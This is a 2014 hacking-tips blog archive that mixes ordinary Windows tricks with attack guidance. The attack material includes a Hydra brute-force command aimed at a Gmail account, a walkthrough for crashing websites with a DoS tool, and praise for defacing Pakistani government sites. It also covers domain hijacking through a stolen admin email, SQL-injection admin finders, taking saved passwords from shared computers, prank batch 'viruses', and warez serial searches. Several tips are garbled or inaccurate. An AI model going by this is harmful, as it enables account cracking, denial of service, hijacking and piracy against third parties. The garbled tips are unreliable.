root@RumKali:~#hydra -S -l rumhacktips@ gmail.com -P /root/Desktop/pw list 1.txt -e ns -V -s 465 smtp.gmail.com smtp

it will try all possible combination of passwords that present in your Word-list. When it will find valid password. it will stop the scanning and notify you “One valid Password found“.

Monday, August 4, 2014

dos attack tool

word top most attacking method dos attack method and you can download this tool following link
download

Saturday, August 2, 2014

Godzilla Hacker Takes Down Several Pakistani Government Websites

While the rest of the world was engaged in cyber security and privacy, an Indian patriotic hacker targeted 43 major Pakistani Government official websites, including‘President of Pakistan’, ‘Government of Pakistan’, 'Ministry of Defence’, and wholeMinistry of Pakistan.
Indian hacker Godzilla claimed responsibility to hack into one of the main proxy server of the Pakistan Government, which is being used to manage all the government websites.

http://www.pakistan.gov.pk
http://www.presidentofpakistan.gov.pk
http://www.mod.gov.pk
http://www.railways.gov.pk

www.cabinet.gov.pk
www.moitt.gov.pk . . . . . . and many more.

forensic software

more than 100 forensic software
forensic software
more than 100 forensic software
forensic software

Wednesday, July 16, 2014

System information

system up time only for xp professional edition It boasts how long it can stay up. Whereas previous versions of Windows were coy about how long they wentbetween boots, XP is positively proud of its stamina. Go to the Command Prompt in the Accessories menu from the All Programs start button option, and then type 'systeminfo'.
The computer will produce a lot of useful info, including the uptime. Ifyou want to keep these, type 'systeminfo > info.txt'.
This creates a file called info.txt you can look at later with Notepad. (Professional Edition only).

Remove Stored username and Passwords !

To remove the Stored User Names and Passwords from your system, try this: Click Start, Run and type Control keymgr.dll Remove the entries from the list. The other ways to access this dialog are: TypeControl Userpasswords2 in RUN box, click Advanced, Manage Passwords -or- From Control Panel, select your User Account, click Manage your network passwords It Works

What Is Local File Inclusion ?

A LFI is, as the title says, a method for servers/scripts to include local files on run- time, in order to makecomplex systems of procedure calls. Well most of the time, you find the LFI vulnerabilities in URL's of the web pages. Mainly because developers tend to like the use of GET requests when including pages. I will explain it fully with example in my next post,

Trace IP Address Of Websites ¤

Follow these steps: Go to s tart>run> Type cmd>tracert ( nameof the website) eg: tracert http:// www.google.com It will show many IP addresses how they are travelling, copy last shown IP. Now go to http:// www.ip2location.com/n paste IP in Find. It will show where the IP address location is.

Convert FAT - NTFS

To convert a FAT partition to NTFS, perform the following steps.
1)Open 'Command Prompt'.
2)At the command prompt, type the following-CONVERT [driveletter]: /FS:NTFS.'Convert.exe' will attempt to convert the partition to NTFS.
NOTE :-Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best toperform a full backup of the data on the drive that it is tobe converted prior to executing the convert command.

How to crash small websites using RDOS

Have you ever wanted to DOS attack on a website. Here I am going to write about a tool which is really helpful but it wouldn't be effective on big servers. NOTE: Please do not try to this tutorial to harm any other's website. I will not be responsible inany case. If you are not agree, please leave this website without reading further tutorialfor cool computer tricks click here You need
1.Port ScannerDownload

2.rDOSDownload
3.Ip Hiding toolDownload
Follow these steps:
1:First of all you need to know the IP address of the website you want to crash.Use ping command in windows to get the ip address of the website. open CMD and enterping www.website.com Now you have the IP address of the website.
2:Now use Port scanner to check whether PORT 80 is open or not. If PORT 80 is not open choose another website to hack :Potherwise you can crash this website.
3:Now open your rDos. Enter your victims ip that you got from
step 1.It will ask you for the port to attack use port 80 that’s why we scanned to make sure that 80 was open! If it is closed it will not work.comment if you have any problem

WordPress Security Scanning With WpScan Android App

Wpscan is a blackbox WordPress security scanner written in Ruby. This app was also available on Google Play store, but now it is unavailable. You can download the full source of the app from github.Read :Joomla Vulnerability scanner This app attempts to scan and find all the security flaws in WordPress installation. I will suggest you to use desktop version of WpScan if possible. It has more features that the app.

top 10 website to learn hacking

http://eakala.com/10-best-hacking-websites-learn-ethical-hacking/

top 10 website to learn hacking

http://eakala.com/10-best-hacking-websites-learn-ethical-hacking/

bhagvatgita in hindi,marathi,gujarathi,english

http://www.gitainternational.com/hindi-audio.htm

Thursday, July 10, 2014

top 10 url shortening service


Url shortening is a method where a long url or a link is shortened . This method is mainly used in social networking sites like twitter, friendfeed, indenti.ca.. etc .All the below sites are fast and free url shortening services and are rated as top 10 url shortening services
1 .Bit.ly
2 .Goo.gl
3.Tinyurl.com
4.Is.gd
5.Doiop.com
6.Fwd
7.Shortlinks
8.Simurl.com
9.Ow.ly
10.Fur.ly
IF YOU LIKE THIS POST ,PLEASE SHARE IT!

Saturday, July 5, 2014

how to add. tk domain to 000webhost.com



How to add dot.tk domain name to 000web host...

The 000webhost.com is a free web hosting service without advertising!.It is 100% free and we can host 1.5Gb files in 000webhost.com.

more information please visit www.000webhost.com.dot.tk is a free domain service and domain name redirecting service.

we can get free domain name from dot.tk. we can use those service for free self hosted blog. First go to dot.tk and get and get free domain name.

now go www.000webhost.com. and click order now link .now you can see following page. fill the form using your details. Type your dot.tk domain name in the"I want to host my own domain (domain must be registered already)"box.ex - www.yourdomain.tkNow click Createmy accountlink.Now Log into your dot.tk account using your e-mail address and password. go to “List my domains” link. after click the“modify”button (near the domain name) select the“use custom dns service”and fill the“name server”box using following details

.name server 1 -ns01.000webhost.comname server 2 - ns02.000webhost.comand click“next”Now finished work. Now your domain name and web hosting service is redy.

Monday, June 30, 2014

Methods of Finding Admin Login Page of a Website


1.Adding URL This is the first and easiest method to find admin login page. You can add some words after the URL.

www.site.com/admin or www.site.com/administrat or www.site.com/login or www.site.com/wp-login.php www.site.com/admin.php

2.Using various scripts You can use various scripts like various admin finder to get the admin page.Here I am showing you an useful scripts which will help you to get the admin page.

3.Crawling software You can use various crawling tool to crawl the website and get the login page. These website crawl all the pages of the website and show the list of all pages and directories.

4.Robots.txt By default various search engines crawl the entire site and by using robots.txt the site owner actually gives the list of links that are not to be crawled by the engine.Now most of the time the admin ask the engine not to crawl the admin page so if you view the robots.txt you can get the link to the login page. www.site.com/robots.txt

5.Google dork You can use google dorks to get the login page.some of the dork that you can use are Site: site.com “admin” Site: site.com inurl:login site: site.com intitle:"admin login"

6.Online There are few websites that can help you in finding admin login pages. You can use the site http://sc0rpion.ir/af/to find login page online

7.Havij At last you can use the all time popular Havij to find admin page. Havij is a popular SQL injection toolthat has an option to scan and search for admin login pages

virus removing tricks.

If your Pen Drive is infected with any of the following viruses:
* Autorun.inf , * new folder.exe, * Iexplorer.vbs, * Bha.vbs, * nfo.exe, * New_Folder.exe, * ravmon.exe, * RVHost.exe, or any other files with extension. Actually this viruses are hidden and can't be seen even after you enable show hidden folders
Following simple dos command will change the attributes of these files ,there after you can remove it by pressing delete key.
Follow these steps:
Step1.:Type cmd in Run
Step2.: Switch to the drive on which pen drive is connected (like C:\> h: enter)
Step3.: type exactly as attrib -s -h *.* /s /d and hit enter (don't forget spaces).
Now you can see hidden virus files and you can delete them.

How To Open Banned Websites WIth Proxy Sites ?

1. Open www.boomproxy.com in your browser.
You can also use any proxy site 2. After that enter the URL of the site which you want to open like below.
3. Now click the Hide Me button and enjoy
.

How To Hack Saved Password In Firefox ?

1. Open Firefox Web Broweser
2. Then Click onFireFox>Option>Optionas shown in below picture
3. Then a POP Up box will appear, In that go tosecurityand click onShow Passwordsas show below.
4. Now click on website whose password you want to see ans click onshow passwordas shown in below image. (Note: It will ask for confirmation so click on yes when dialog box appears)
5. Done, You have hacked password of your victim with few simple steps. You can try this at school computer lab if someone have saved their password

Simple Trick To Convert A Webpage To PDF File

1. Open the Google Chrome Browser on your PC or MAC
2. Then go to the web page that you want to convert as a PDF.
3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser.
stination to “Save As PDF” and hit the save button.
5. The current web page will instantly be downloaded as a PDF document

Download Youtube Videos Without Any Software

1. First Go to YoutubeHomepage.
2. Then select the video you want to download. I will demonstrate with video url given below.
http://www.youtube.com /watch?v=_JAa3NvP6f4
Now addsaveorssorkick before youtube and press enter.
3. After adding any of the above keyword the above link will become.
http://www.save youtube.com/watch?v=_J Aa3NvP6f4
Or http://www.ss youtube.com/watch?v=_J Aa3NvP6f4
Or http://www.kick youtube.com/watch?v=_J Aa3NvP6f4
4. Now you will be redirected to a new page from where you can download youtube videos in any format of your choice. You may also download only the soundtrack of the video in mp3 format.

How To Block Youtube Ads ?

Today i will share with you an amazing peace of programme called Block YouTube Ads . It removes all video ads before and during videos, as well as removes all those ads that pop at the bottom of the screen while the video is playing. It works on all major browser such Internet explorer, google chrome and mozilla firefox.
How to do ?

1. Download Youtube Ads Blocker
2. Double click on downloaded file.
3. Follow the on screen instruction.

How to domain name hijacked


How a Domain Name is Hijacked In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So, let me first tell you what domain hijacking is all about. domain Domain hijacking is a process by which Internet Domain Names are stolen from its legitimate owners. It is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website). The Operation of a Domain Name is as Follows: domain+1 Any website say for example www.cyber. inconsists of two parts. The domain name ( www.cyber. in) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows: After registering a new domain name, we get a control panel where in we can have a full control of the domain. From this domain control panel, we point our domain name to the web server where the website’s data (web pages, scripts etc.) are actually hosted. For a clear understanding let me take up a small example: John registers a new domain called “ abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “ abc.com” to point to his web server (of Y). Now, whenever an Internet user types “ abc.com”, the domain name “ abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works. What Happens When a Domain Name is Hijacked? web-domain-600-304 Now, let us see what happens when a domain name is hijacked. To hijack a domain name, you just need to gain access to the domain control panel and point the domain name to some other web server other than the original one. So, to hijack a domain you need not gain access to the target web server. For example, a hacker gets access to the domain control panel of “ abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “ abc.com” he is taken to the hacker’s website (Z) and not to Jack’s original site In this case the Jack’s domain name ( abc.com) is said to be hijacked. How the Domain Names are Hijacked? domain+2 To hijack a domain name, it is necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients: The domain registrar name for the target domain. The administrative email address associated with the target domain. These information can be obtained by accessing the WHOIS data of the target domain. To get access to the WHOIS data, go to whois.domaintoo ls.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this, you’ll get the “Administrativecontact email address”. domain+3 To get the domain registrar name, look for the words something like: “Registered through:: XYZ Company”. Here XYZ Company is the domain registrar. In case if you do not find this, scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar. The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So, to take full control of the domain, the hacker will have to hack the administrative email associated with it. Email hacking has been discussed in my earlier post: How to hack an email account Once the hacker takes full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There, he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done, all the details to reset the password will be sent to the administrative email address. forgot+p Since the hacker has the access to this email account, he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes. EDUCATIONAL+PURPOSE

Sunday, June 29, 2014

Multiple login in yahoo Without Using any Software

You can login with multiple id’s on the same yahoo messenger without any download or patch . Follow these steps :

1. Go to Start —-> Run . Type regedit, then enter .

2.Navigate to HKEY_CURRENT_USER ——–> Software —>yahoo —–>pager—->Test

3.On the right page , right-click and choose new Dword value .

4.Rename it as Plural.

5.Double click and assign a decimal value of 1.

Its done!!

Now close registry and restart yahoo messenger and try Multiple Login…………………….

How to create more than one file with same name in same folder………….

How to create more than one file with same name in same folder…………. Suppose first file name is “HackingBank” and saved in DATA folder.
Now if you want to create a file in DATA folder with “HackingBank” name.
Can you do it……… type the name of file again “HackingBank” then press Alt+0160 Now press the save button Now two file in data folder with the name of hacking is saved
now enjoy…………

How To Make more than thousands of folder Using notepad

Make thousands of folder with notepad. 1. Open notepad.
2. Copy the following code:
@echo off :top md %random% goto top
3. save it as fun.bat
If you will open that file that folder will be rained by more than thousand of folders. It will not cause any harm to your computer, if you want you can try this.

Enable Registry Editor Disabled By Admin

Windows registry contains settings for low level operating system component as well as applications running on windows. In this tutorial i will teach you to enable registry editor disabled by the admin. So lets do it.
What Is Registry?
Windows registry ishierarchical databasethat stores configuration setting and option on microsoft windows operating system.It contains settings for low level operating system component as well as applications running on windows.
Registry is also called as Brain of Windows which store all information in form of registry keys Technically known as DWORD or STRING or BINARY or MULTI_STRING values which stores data.
How To Enable Registry Editor Disabled By Admin ?
1. Open Notepad and copy below codes.
REGEDIT4 [HKEY_CURRENT_USER\Soft ware\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=d word:00000000
2. Now save the file asanything.reg(.reg is must)
3. Double click the savefile.
4. Done !!

How to view saved password in google chrome ?

1.Open Google Chrome
2.Go to Settings (Its on the Right Corner)
3.Then Click on Advance Settings
4.Scroll Down and their will bepassword and formsfrom their click onManage saved password.
5.Then list of all websites whose passwords are saved on browser will be listed.
6.Click onshowto view those passwords
7.Enjoy!!

Hide file behind the images

1. Select an image to be used for hiding file behind the image.

2. Now select a file to hide behind the image and make it in.RAR format.With the help of the WinRAR.

3. And most important is thatpaste both the files on desktop. You may do this anywhere instead of desktop if you have some basic understanding of command line.

4. Now open cmd by going toStart>Accessories>Command Prompt and type following commands in it.

cd desktop

5.CDstands for change directory by typing above command you change your directory to desktop. After that type command given below.

Copy /b

image name.jpg+filename.rar final image.jpg Replace imagename.jpgwith the name of image you want your file to be hidden behind. Don't forget to add image format (Eg: .jpg,.png,.gif) Replacefilenamewith name of your file you want to hide. It must be in .rar format. Finally Replacefinalimage.jpgwith whatever name you want your final image with hidden files should be. This is the image where your file will be hidden.

6. Now when you will try to open this newly created image it will open as normal image, but to open you hidden file you need follow steps given below.

How To Access Hidden File ? To access your hidden file you need to open the newly created image in winrar. Just follow simple steps given below to do that.

1. Open winrar

2. Now locate your image and open it or simply drag your image in winrar.

3. Extract the file and done.

Monday, June 23, 2014

chat with command promat

What you need? > you need your friend's IP Address and Command Prompt Open Notepad and write this code : @echo off :A Cls echo MESSENGER set /p n=User: set /p m=Message: net send %n% %m% Pause Goto A Save this as "Messenger.Bat". Open command prompt Drag bat file over to Command Prompt and press Enter This should came up Now, type the IP Address of the computer you want to contact and press enter You will see something like this: Now all you need to do is type your message and press Enter. Enjoy..!!

Sunday, June 22, 2014

How To Create Undeletable And Unrenamable Folders ?

1.Go to Start and then Click on Run

2.Type cmd & hit enter (To open Command Prompt ).

3.Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:

4.Type D: or E: and hit enter

5.Type md con\and hit enter (md - make directory)

6.You may use other words such asaux, lpt1, lpt2, lpt3 up to lpt9instead of con in above step.

7.Open that directory, you will see the folder created of name con.

8.Try to delete that folder or rename that folder windows will show the error message. How to delete that folder ? It is not possible to delete that folder manually but you can delete this folder by another way mentioned below. 1.Open Command Prompt 2.Type D: if u created this type of folder in D: drive) & hit enter 3.Type rd con\(rd - remove directory) 4.Open that directory and the folder will not appear because it is removed.

find website ip address

1. Go toStart> Type CMD and press Enter.
2. Now write Ping followed by website URL whose IP you want to find.
3.
It will take less then a second and come up with the results as shown below.

is your antivirus working perfectly

1.First openNotepadand copy below code into it.

X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Save the file as virus.exe

How to diasable mouse

1. OpenNotepadand copy below codes rem --------------------------------- rem Disable Mouse set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass" reg delete %key% reg add %key% /v Start /t REG_DWORD /d 4 rem --------------------------------- 2. Save this file asvirus.bat 3. Done you just created your virus.

How to use google as a proxy

Method 1. Visit whatismyipaddressand note down you real Ip Address 2. Now Go to Google Translate 3. From Under Detect Language, Chose your language in my case English 4. Now type http://whatismyipaddres s.com/in text area and click on Translate 5. Now check your Ip Address, Its different from the real one. Method 2. Go to link given below: http://www.google.com/translate?langpair=es|en&u=www.swapnil4help.blogspot.com 2. Change www.swapnil4help.blogspot.com to website you like to visit. 3. Done! If you use this trick, you are not sure to protect your privacy, this kind of connection lets you see blacklisted or banned pages but does not hide your IP address.

Sunday, June 15, 2014

How to stop someone internet access

How to stop someone's internet access:::: @Echo off Ipconfig /release Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it However, this is VERY easy to fix. Simply type in IPconfig /renew

Thursday, June 12, 2014

Password Protect Any Folder Without Any Software

1. Open Notepad and Copy code given below into it. cls @ECHO OFF title swapnil4help.blogspot.com if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK if NOT EXIST MyFolder goto MDMyFolder :CONFIRM echo Are you sure to lock this folder? (Y/N) set/p "cho=>" if %cho%==Y goto LOCK if %cho%==y goto LOCK if %cho%==n goto END if %cho%==N goto END echo Invalid choice. goto CONFIRM :LOCK ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" echo Folder locked goto End :UNLOCK echo Enter password to Unlock Your Secure Folder set/p "pass=>" if NOT %pass%==coolhacksgoto FAIL attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder echo Folder Unlocked successfully goto End :FAIL echo Invalid password goto end :MDMyFolder md MyFolder echo MyFolder created successfully goto End :End 2. Save the notepad file as lock.bat(.bat is must) 3. Now double click on lock.bat and a new folder will be created with nameMyFolder 4. Copy all your data you want to protect in that New folder 5. Now double click on lock.bat and when command promp appearsType Yand press enter. 6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat 7. It will ask for password enter your password and done. (Default password is coolhacks) To change the password replacecoolhackswith new password in the above code

How to trace your facebook profile visitor

Step 1 ) Go To Your Facebook Profile Page.

Step 2 )  Now Press "Ctrl + U" From Your Keybboard For SeeSource Code Of Your Profile Page .

Step 3 ) Now Pres "Ctrl  + F" From YourKeyboardTo Open SearchBox.Step

4 )  NowSearchThis Code{"list":Step

5 ) You Find Some Facebook ProfileID'sAre Like Shown Below

Step 6 ) There Are Some Facebook ProfileID'sOf Your Friends WhoVistedRecently

Step 7 ) The First OneID'sAre Showing Visits The Most Number Of Time.

Tuesday, June 10, 2014

Finding serial number in google by swapnil(hacker)

ok, this is a little trick that i usually use to find cd keys with google.

if your looking for a serial number for nero (for example) goto google.com and type nero 94FBR and it'll bring it up

this works great in google

HOW DOES THIS WORK?

Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things.

1)The pages that are returned are pages dealing specifically with the product you're wantinga serial for.

2)Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.

I hope this trick help you finding your ccd keys easily

Enjoy :)

HI frnds im swapnil im doing hacking with indian hackers team